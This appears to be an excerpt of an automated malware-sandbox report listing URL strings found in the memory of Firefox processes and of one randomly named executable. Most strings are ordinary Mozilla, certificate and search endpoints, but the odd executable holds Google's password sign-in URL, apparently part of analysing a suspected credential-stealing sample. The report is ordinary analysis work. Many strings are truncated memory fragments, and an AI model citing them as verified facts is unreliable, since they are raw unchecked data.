Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000015.00000002.2963524052.00002F41F0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963405313.00002CE3A7F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/0S
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/3Y
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963642951.00003172D3A00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/:Y
Source: firefox.exe, 00000015.00000002.2963642951.00003172D3A00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/GZ
Source: firefox.exe, 00000015.00000003.2770730622.00000259388DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2905131430.00000259388FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2920348338.000002593A855000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2790835142.00000259402C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2832165299.00000259412FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2912271172.0000025939714000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.0000025940310000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821943129.000002593ACE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2951042509.000002594149C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2960416889.0000025C0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2814866254.00000259397D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2920348338.000002593A89F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2929941467.000002593B6F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2896388912.00000259380FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2898849681.0000025938203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2912271172.00000259397A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821943129.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A95D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2831553568.00000259412DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000015.00000002.2963524052.00002F41F0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963405313.00002CE3A7F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/Z
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/ucketZ
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000015.00000003.2821943129.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2880770582.00000259339DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000015.00000002.2940088335.0000025940327000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000015.00000003.2821943129.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.0000025940327000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2880770582.00000259339DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000015.00000002.2894066055.0000025937812000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000015.00000002.2944981005.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2815909694.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000015.00000002.2894951579.0000025937D3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A6F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2905873141.0000025938947000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2881592543.0000025933AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A940000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2905873141.0000025938967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934447000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.0000025940333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A478000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A94F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.0000025940346000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3082789823.000001EF2E4D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000015.00000003.2806581380.000002593A9D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2921089355.000002593A9D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000015.00000003.2808209221.000002593A467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-su
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2936356785.000002593FDA0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.0000025940327000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2936356785.000002593FDA0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2940088335.0000025940327000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000015.00000002.2921089355.000002593A997000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000015.00000003.2816546786.000002594064C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000015.00000003.2815648543.00000259406B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000015.00000003.2805571289.000002593B7C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2805571289.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B79F000.00000004.00000800.00020000.00000000.sdmp, b29e59e54d.exe, 0000001A.00000003.3018139613.0000000001290000.00000004.00000020.00020000.00000000.sdmp, b29e59e54d.exe, 0000001A.00000002.3020387270.0000000001290000.00000004.00000020.00020000.00000000.sdmp, b29e59e54d.exe, 0000001A.00000003.3016980289.0000000001290000.00000004.00000020.00020000.00000000.sdmp, b29e59e54d.exe, 0000001A.00000003.3018035506.0000000001290000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3099000605.000001EF2FA79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000015.00000002.2889978017.00000259358D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.00000259358AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3072972441.000001EF2D1F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3051133453.000001EF29652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgmaybeShowOnboardingDialogaccount-connection-disconnectedshowBadgeOnlyNotif
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A49F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3112028417.000001EF30F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000015.00000002.2952417248.0000025942489000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3121604934.000001EF35723000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000015.00000002.2921089355.000002593A997000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.comY
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000015.00000002.2906919520.0000025938E3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2905873141.0000025938967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000015.00000002.2906919520.0000025938E3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2944148777.000002594054B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2898849681.000002593826C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000015.00000002.2964091165.0000370D2CF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3121604934.000001EF35723000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000015.00000002.2880770582.00000259339AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000015.00000002.2880770582.00000259339AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000015.00000002.2905873141.00000259389E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2909163190.0000025939126000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085467799.000001EF2EA7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000015.00000002.2938420212.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2821255219.00000259401AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3125524996.000001EF35C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000015.00000002.2951042509.000002594149C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000015.00000003.2756753958.0000025937E1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2893877831.0000025937600000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000003.2756585177.0000025938200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757347333.0000025937E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2756907545.0000025937E3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2757162605.0000025937E60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2909163190.0000025939126000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3083282313.000001EF2E582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000015.00000002.2905873141.00000259389E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000015.00000002.2905873141.00000259389E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000015.00000002.2937149751.000002593FE45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000015.00000002.2880770582.00000259339AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.000002593582E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2889978017.0000025935803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867917308.000002ADC16E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2867425093.000001CBE7AEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3074810196.000001EF2D5B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
